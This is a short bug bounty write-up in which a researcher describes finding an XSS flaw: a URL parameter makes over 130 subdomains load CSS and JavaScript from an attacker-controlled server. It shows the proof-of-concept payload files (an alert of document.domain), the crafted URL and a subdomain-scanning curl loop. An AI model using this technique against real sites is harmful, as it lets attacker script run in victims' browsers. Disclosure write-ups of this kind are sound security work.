Critical XSS in 130+ Websites
Get Parameter Misconfiguration Leads to P1 XSS
السلام عليكم ورحمة الله,
الحمدُ للهِ حمدًا كثيرًا طيِّبًا مُبارَكًا فيه مُباركًا عليِه كما يُحِبُّ ربُّنا ويرْضى.
Hello world,
All praise is to Allah, praise in abundance, good and blessed.
i get this endpoint by using waymore + katana, in results i see endpoint that contain this interested parameter elementsUrl i try in it my burp collaborator then i see that i received DNS & HTTP requests to this endpoints
/styles.css
/deployment/env/redacted.config.js
the requests commes just when i browse the url from my browser that’s mean there is no ssrf then i try to read source of the page and i see some interested js codes
i see that the page import js and css from external endpoint
i go to my server and i created two endpoints
styles.css :
body::before {
content: "HELLO FROM MCHKLT";
color: red;
font-size: 24px;
font-weight: bold;
display: block;
text-align: center;
margin-top: 20px;
}/deployment/env/redacted.config.js :
document.title = "HELLO FROM MCHKLT";
alert(document.domain);after adding my website to the vulnerable endpoint was like
http://target/v2/sso.php?env=redacted&elementsUrl=https://mchklt.server/
the site gonna import css and js from malicious endpoint that created by me
then boom
after this i do my best part
i take the endpoint then i do a simple bash script that gonna try the endpoint in all domains & subdomains of my target
for i in $(cat subs);do curl $i | grep “elementsUrl”; doneafter doing that i get +10 subdomains of my target that was infected and after some analysing and researching i found that the bug was in a service by target.com
by using google dorks i found +130 subdomain that uses target.com service and it’s vulnerable .
i report it but
anyway alhamdulillah
Thanks for reading,
if you can connect me in LinkedIn i wanna more friends that interested in Bug Hunt & Cyber Sec .
